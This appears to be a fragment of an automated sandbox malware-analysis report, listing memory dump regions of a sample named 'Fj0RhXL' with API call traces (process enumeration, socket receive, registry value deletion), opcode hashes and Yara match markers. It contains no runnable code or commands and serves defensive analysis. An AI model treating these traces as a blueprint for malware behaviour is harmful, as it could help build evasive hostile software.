                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                          • String ID: csm$csm
                                          • API String ID: 2163707966-3733052814
                                          • Opcode ID: dd87a3a69fd9cbd62dce8db1b6b98e2948fda29e9069b592d2c3bb4e41ac0c37
                                          • Instruction ID: 63bb8c517f67914be7434e44ebccd8d1c2d1681bdbd7b89301f7eeefc2d0a3d4
                                          • Opcode Fuzzy Hash: dd87a3a69fd9cbd62dce8db1b6b98e2948fda29e9069b592d2c3bb4e41ac0c37
                                          • Instruction Fuzzy Hash: A2014676001609BBDF12AF95CD44EAA7F6AEF08350F088021FD1819160D732DAB1DBA0
                                          APIs
                                          • ___BuildCatchObject.LIBCMT ref: 032C3540
                                            • Part of subcall function 032C349B: ___BuildCatchObjectHelper.LIBCMT ref: 032C34D1
                                          • _UnwindNestedFrames.LIBCMT ref: 032C3557
                                          • ___FrameUnwindToState.LIBCMT ref: 032C3565
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                          • String ID: csm$csm
                                          • API String ID: 2163707966-3733052814
                                          • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                          • Instruction ID: 2cb1bb3120389844501e5cf404e3ee3a778d3e1529e4bca3855dbe95478dcf99
                                          • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                          • Instruction Fuzzy Hash: AE01EC7902024ABFDF12DE51CC44EEA7F69EF08354F048518BE1819121D77695A1DBA1
                                          APIs
                                          • ___BuildCatchObject.LIBCMT ref: 02F13B73
                                            • Part of subcall function 02F13ACE: ___BuildCatchObjectHelper.LIBCMT ref: 02F13B04
                                          • _UnwindNestedFrames.LIBCMT ref: 02F13B8A
                                          • ___FrameUnwindToState.LIBCMT ref: 02F13B98
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                          • String ID: csm$csm
                                          • API String ID: 2163707966-3733052814
                                          • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                          • Instruction ID: 1318c293a8e8b2344f899bf9513cd7095fd62a1898f35f44a5963b774604b0eb
                                          • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                          • Instruction Fuzzy Hash: E701F67540110ABBDF22AF52CC44EAB7F6AEF08394F444094BE1815160E732D9B1DFA1
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _fprintf
                                          • String ID: [%d %d$]0 setdash
                                          • API String ID: 1654120334-3947119172
                                          • Opcode ID: bda50100d3e777e0c44a8d49efb6efc870366485c9890fa0d0709fb5680cc153
                                          • Instruction ID: 7aa721df6bf711763f72f4d8219bd6d3f98971bb776c7cddad11cfdc072188c7
                                          • Opcode Fuzzy Hash: bda50100d3e777e0c44a8d49efb6efc870366485c9890fa0d0709fb5680cc153
                                          • Instruction Fuzzy Hash: CBE02232B062206ADA42B325AC01E0CB770C347B0C7209427E008ABA50D732ADD559C3
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 03D964D7
                                          • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 03D964E7
                                          • RegCloseKey.ADVAPI32(?), ref: 03D964F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseDeleteOpenValue
                                          • String ID: Console$IpDatespecial
                                          • API String ID: 849931509-1840232981
                                          • Opcode ID: fe37158da740e3670bc47c230e9f8ad2944d0e54392e6cafe5b7c87d6f326af0
                                          • Instruction ID: 3f57b07058c7c98078290913a2bf6ee0328232d87ad11f73e2f77fe8ddf28d63
                                          • Opcode Fuzzy Hash: fe37158da740e3670bc47c230e9f8ad2944d0e54392e6cafe5b7c87d6f326af0
                                          • Instruction Fuzzy Hash: 1EE08673245340EFD320A660AC4FF997764F78C712F04490DF645A1285D561E524C765
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 220294bf03629286aa4368727a6f7a2f69b2a938bfb709ea968c309f702b79a4
                                          • Instruction ID: 1b67cb44940b4643ff10e5bb8243d4bdc372459702c65ebb87dd7828e0abfe29
                                          • Opcode Fuzzy Hash: 220294bf03629286aa4368727a6f7a2f69b2a938bfb709ea968c309f702b79a4
                                          • Instruction Fuzzy Hash: 9F613C75A01606AFCB18EF69C580BA9F7E5FF08614F54866DD85ACB700E730F949CB90
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,90594F2A), ref: 03D966AA
                                          • _memset.LIBCMT ref: 03D966CB
                                          • _memset.LIBCMT ref: 03D9671B
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 03D96735
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 03D96787
                                            • Part of subcall function 03D9ABD2: _malloc.LIBCMT ref: 03D9ABEC
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process32_memset$CreateFirstNextSnapshotToolhelp32_malloc
                                          • String ID:
                                          • API String ID: 2416807333-0
                                          • Opcode ID: d2d620f2b4d74cbf403e4581d40258f7cda19caaf58fc07c23cd27e09e76ad5f
                                          • Instruction ID: 40e6cde1a91b7f2ca609d5459c51136dd8592eea7a3bb9513ed514519806a3fc
                                          • Opcode Fuzzy Hash: d2d620f2b4d74cbf403e4581d40258f7cda19caaf58fc07c23cd27e09e76ad5f
                                          • Instruction Fuzzy Hash: 9341C671A00605DEEB10DF74CC85FAAB3B8EF45B24F044696E9199B2C0E775DA84CBA1
                                          APIs
                                          • recv.WS2_32(?,?,00000598,00000000), ref: 03D83C8F
                                          • SetLastError.KERNEL32(00000000,?,?,03D8396F,?,?,00000000,000000FF,00000000), ref: 03D83CCA
                                          • GetLastError.KERNEL32(00000000), ref: 03D83D15
                                          • WSAGetLastError.WS2_32(?,?,03D8396F,?,?,00000000,000000FF,00000000), ref: 03D83D4B
                                          • WSASetLastError.WS2_32(0000000D,?,?,03D8396F,?,?,00000000,000000FF,00000000), ref: 03D83D72
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$recv
                                          • String ID:
                                          • API String ID: 316788870-0
                                          • Opcode ID: 0b166aa879ee4be1be63300584875a3b9e71f316e2a20a632b1fd00846478880
                                          • Instruction ID: a66afc534047ac868270ec3e0beeb340d90e19140f16daba6aafc8861a578b50
                                          • Opcode Fuzzy Hash: 0b166aa879ee4be1be63300584875a3b9e71f316e2a20a632b1fd00846478880
                                          • Instruction Fuzzy Hash: 9E31C77F604200DBEB54FF68E4C4B6977A9EB85B24F14056AED09CB385D731F8818761
                                          APIs
                                          • recv.WS2_32(?,?,00000598,00000000), ref: 02F03CAF
                                          • SetLastError.KERNEL32(00000000,?,?,02F0398F,?,?,00000000,000000FF,00000000), ref: 02F03CEA
                                          • GetLastError.KERNEL32(00000000), ref: 02F03D35
                                          • WSAGetLastError.WS2_32(?,?,02F0398F,?,?,00000000,000000FF,00000000), ref: 02F03D6B
                                          • WSASetLastError.WS2_32(0000000D,?,?,02F0398F,?,?,00000000,000000FF,00000000), ref: 02F03D92
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: ErrorLast$recv
                                          • String ID:
                                          • API String ID: 316788870-0
                                          • Opcode ID: 0958b70a7771e32f5d268351d4f41f7c20151df46ca5f61b6efdd4789cb54c23
                                          • Instruction ID: 0556ef6ce553100b9b7d721575d548aaeac0ae73c73ac8ea7d913e182cd0c33e
                                          • Opcode Fuzzy Hash: 0958b70a7771e32f5d268351d4f41f7c20151df46ca5f61b6efdd4789cb54c23
                                          • Instruction Fuzzy Hash: EE312C72A052049FEB249F68E8C875977A9FB843A4F9145A6EF06CF2C5D731D8C0DB50
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$_memset
                                          • String ID:
                                          • API String ID: 2425037729-0
                                          • Opcode ID: 22259c1af89cb8a3b692209fbe61f140a5860c4150ea0bd7b7cf87d3a12afaca
                                          • Instruction ID: f541c57d1a9f5044a45839e4f2146c40f7d5cfdd4080c1b5b848e24fa31345a0
                                          • Opcode Fuzzy Hash: 22259c1af89cb8a3b692209fbe61f140a5860c4150ea0bd7b7cf87d3a12afaca
                                          • Instruction Fuzzy Hash: 6721FB76B011085BCB14EF59D8909BEB3ADEBC4B10B1940EDEC49C7601F731ED5187A0
                                          APIs
                                          • GetFileType.KERNEL32(?,?,?,6C443338,0000000C), ref: 6C3EDEE9
                                          • GetLastError.KERNEL32(?,?,6C443338,0000000C), ref: 6C3EDEF3
                                          • __dosmaperr.LIBCMT ref: 6C3EDEFA
                                          • __alloc_osfhnd.LIBCMT ref: 6C3EDF1B
                                          • __set_osfhnd.LIBCMT ref: 6C3EDF45
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                                          • String ID:
                                          • API String ID: 43408053-0
                                          • Opcode ID: 73ae4a9a28e3ce963359d0c9717f87ef8f86b400ee813406beac6130cbdf426d
                                          • Instruction ID: 80f61a2922cd2f3f937ad3e1af8fb2ae98a0e5d34a6bddbfe58f184b75d8233e
                                          • Opcode Fuzzy Hash: 73ae4a9a28e3ce963359d0c9717f87ef8f86b400ee813406beac6130cbdf426d
                                          • Instruction Fuzzy Hash: 5621F5315456249ADB01CF78C4047C97B60AFCA32CF288B46E4B08BAD6DB36D286DF91
                                          APIs
                                          • _malloc.LIBCMT ref: 03D9B77E
                                            • Part of subcall function 03D9AB3E: __FF_MSGBANNER.LIBCMT ref: 03D9AB57
                                            • Part of subcall function 03D9AB3E: __NMSG_WRITE.LIBCMT ref: 03D9AB5E
                                            • Part of subcall function 03D9AB3E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE), ref: 03D9AB83
                                          • _free.LIBCMT ref: 03D9B791
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap_free_malloc
                                          • String ID:
                                          • API String ID: 1020059152-0
                                          • Opcode ID: ceec27e40db32262e7f2440d3df7552dcf9a636204382b1380cb2da06f6d3af7
                                          • Instruction ID: 9d992f08e0fdd7ec9c14d17aff17804564c90cea04485178ce7949d9ac7d0823
                                          • Opcode Fuzzy Hash: ceec27e40db32262e7f2440d3df7552dcf9a636204382b1380cb2da06f6d3af7
                                          • Instruction Fuzzy Hash: 9411A737504715ABEF22FB74BC04A593799EF446B1F264A27F8499E350EE34C84086B0
                                          APIs
                                          • _malloc.LIBCMT ref: 02F0E6F5
                                            • Part of subcall function 02F06F93: __FF_MSGBANNER.LIBCMT ref: 02F06FAC
                                            • Part of subcall function 02F06F93: __NMSG_WRITE.LIBCMT ref: 02F06FB3
                                            • Part of subcall function 02F06F93: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270), ref: 02F06FD8
                                          • _free.LIBCMT ref: 02F0E708
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free_malloc
                                          • String ID:
                                          • API String ID: 1020059152-0
                                          • Opcode ID: 54df5518081aff80901a3de5f300f1f05b259e67c60bc3fa28ec47a6215e9ace
                                          • Instruction ID: ff8027c19473cf666b83df23db73d56e4167c2255ba9ce30e1475d74f9930aee
                                          • Opcode Fuzzy Hash: 54df5518081aff80901a3de5f300f1f05b259e67c60bc3fa28ec47a6215e9ace
                                          • Instruction Fuzzy Hash: CF11EB33E4461D9BCF213B74AC847597796AF443E0B110C65FB65DA1C0DB70A850AE94
                                          APIs
                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 03D8543F
                                            • Part of subcall function 03D99D93: _setlocale.LIBCMT ref: 03D99DA5
                                          • _free.LIBCMT ref: 03D85451
                                            • Part of subcall function 03D9AB04: RtlFreeHeap.NTDLL(00000000,00000000,?,03DA2A36,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE), ref: 03D9AB1A
                                            • Part of subcall function 03D9AB04: GetLastError.KERNEL32(00000000,?,03DA2A36,00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000), ref: 03D9AB2C
                                          • _free.LIBCMT ref: 03D85464
                                          • _free.LIBCMT ref: 03D85477
                                          • _free.LIBCMT ref: 03D8548A
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                          • String ID:
                                          • API String ID: 3515823920-0
                                          • Opcode ID: 4535ae06831067b87fd14e76a6acc9de9d03e6a76d265c670efcbba8b8384e40
                                          • Instruction ID: a7f62d0abae8e0f65dfb67ae52e1d943081fd090a471392b587c8825da3ecbe6
                                          • Opcode Fuzzy Hash: 4535ae06831067b87fd14e76a6acc9de9d03e6a76d265c670efcbba8b8384e40
                                          • Instruction Fuzzy Hash: 4011B2F2900710ABDB20EF69D800A5BF7EADB40A10F188A2BD416C7640D635F504CBA1
                                          APIs
                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 02F02BFF
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 02F02C15
                                          • TranslateMessage.USER32(?), ref: 02F02C24
                                          • DispatchMessageW.USER32(?), ref: 02F02C2A
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02F02C38
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
                                          • String ID:
                                          • API String ID: 2015114452-0
                                          • Opcode ID: 4560a52e8295b7113838aa60240c63292ca7898e0c581b00bd03ef9c9ae5a1c2
                                          • Instruction ID: cbff4a7e6f7fe1b48af66fd250ae22e885414d0798428cde17cfb0ae32b55141
                                          • Opcode Fuzzy Hash: 4560a52e8295b7113838aa60240c63292ca7898e0c581b00bd03ef9c9ae5a1c2
                                          • Instruction Fuzzy Hash: 4001A972F80309B6F710AAA49C95FBAB36CAB44B94F904911FF04FA1C5DBA0E50597B4
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03D84B63
                                          • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 03D84B6D
                                          • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03D84B80
                                          • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 03D84B83
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave
                                          • String ID:
                                          • API String ID: 3168844106-0
                                          • Opcode ID: e6959bed761d3d291bc7e86a2aa71f6b0d2f037146651639ba1b69b81b070b9e
                                          • Instruction ID: e9e94fc49f64fad2517edd3a59db40b5397adc7d59b8138c629ef46ee69c0b0a
                                          • Opcode Fuzzy Hash: e6959bed761d3d291bc7e86a2aa71f6b0d2f037146651639ba1b69b81b070b9e
                                          • Instruction Fuzzy Hash: 830171771002149BD720EB2AFC84B9BB3E8EB89714F050919E186C3210D734F98686A0
                                          APIs
                                          • __CreateFrameInfo.LIBCMT ref: 032C31A8
                                            • Part of subcall function 032C2D38: __getptd.LIBCMT ref: 032C2D46
                                            • Part of subcall function 032C2D38: __getptd.LIBCMT ref: 032C2D54
                                          • __getptd.LIBCMT ref: 032C31B2
                                            • Part of subcall function 032B93AB: __getptd_noexit.LIBCMT ref: 032B93AE
                                            • Part of subcall function 032B93AB: __amsg_exit.LIBCMT ref: 032B93BB
                                          • __getptd.LIBCMT ref: 032C31C0
                                          • __getptd.LIBCMT ref: 032C31CE
                                          • __getptd.LIBCMT ref: 032C31D9
                                            • Part of subcall function 032C2DDD: __CallSettingFrame@12.LIBCMT ref: 032C2E29
                                            • Part of subcall function 032C32A6: __getptd.LIBCMT ref: 032C32B5
                                            • Part of subcall function 032C32A6: __getptd.LIBCMT ref: 032C32C3
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                          • String ID:
                                          • API String ID: 3282538202-0
                                          • Opcode ID: 614a4d17480710d0213c8e438039baab2face61d69a066149231ae24c6ec2870
                                          • Instruction ID: 58249b0ca7fa2527aaef5fa0403200140f489a094d9ed553062f2b501f42522d
                                          • Opcode Fuzzy Hash: 614a4d17480710d0213c8e438039baab2face61d69a066149231ae24c6ec2870
                                          • Instruction Fuzzy Hash: 5C112B75C24309DFDF00EFA4C444AED7BB0FF08310F108569E914AB250DB799A959F60
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02F04B53
                                          • EnterCriticalSection.KERNEL32(?,?,00000000), ref: 02F04B5D
                                          • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02F04B70
                                          • LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 02F04B73
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave
                                          • String ID:
                                          • API String ID: 3168844106-0
                                          • Opcode ID: 960c87a6af9951f4bbe6e9c62b83f9b0a369f62a292701f4f4df3cc6b7de8b69
                                          • Instruction ID: 369218520a7d62285664466921830d325324aeabd3d697f3a2c6c0e7bedc79b6
                                          • Opcode Fuzzy Hash: 960c87a6af9951f4bbe6e9c62b83f9b0a369f62a292701f4f4df3cc6b7de8b69
                                          • Instruction Fuzzy Hash: 1B018FB6A002149BD7209B69FCC4B5BB7E8EB88794F42082DE20683240C734E8458AA0
                                          APIs
                                          • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 03D82D2C
                                          • CancelIo.KERNEL32(?), ref: 03D82D36
                                          • InterlockedExchange.KERNEL32(00000000,00000000), ref: 03D82D3F
                                          • closesocket.WS2_32(?), ref: 03D82D49
                                          • SetEvent.KERNEL32(00000001), ref: 03D82D53
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                          • String ID:
                                          • API String ID: 1486965892-0
                                          • Opcode ID: 1efef285b15f75664197f64b85aeb58c24bff0b47b0a84029985c1172054a302
                                          • Instruction ID: 6dcf11ffc7fb2ed059191af58feb21473a2d286ee2274d063cf9fa0f91e13f7f
                                          • Opcode Fuzzy Hash: 1efef285b15f75664197f64b85aeb58c24bff0b47b0a84029985c1172054a302
                                          • Instruction Fuzzy Hash: 7EF03777500704EBD220AB94DD49F6BB7B8FB89B11F104E5DB69296784DAB0B904CBA0
                                          APIs
                                          • __getptd.LIBCMT ref: 03DA3C7D
                                            • Part of subcall function 03DA2A45: __getptd_noexit.LIBCMT ref: 03DA2A48
                                            • Part of subcall function 03DA2A45: __amsg_exit.LIBCMT ref: 03DA2A55
                                          • __getptd.LIBCMT ref: 03DA3C94
                                          • __amsg_exit.LIBCMT ref: 03DA3CA2
                                          • __lock.LIBCMT ref: 03DA3CB2
                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 03DA3CC6
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                          • String ID:
                                          • API String ID: 938513278-0
                                          • Opcode ID: 0b4b28edefe75b281d170748f72673ec45a3ea9fd38d2f82079e656ebb91440c
                                          • Instruction ID: 4d23b19c860631e3d92fe11c98dd32bd25a55299e4f75e37a238a6e11156ad1e
                                          • Opcode Fuzzy Hash: 0b4b28edefe75b281d170748f72673ec45a3ea9fd38d2f82079e656ebb91440c
                                          • Instruction Fuzzy Hash: 93F0903AA00F10DBD720FB7D9E0575DB7A2EF04B20F148549E4506F2C1CB748A408AA5
                                          APIs
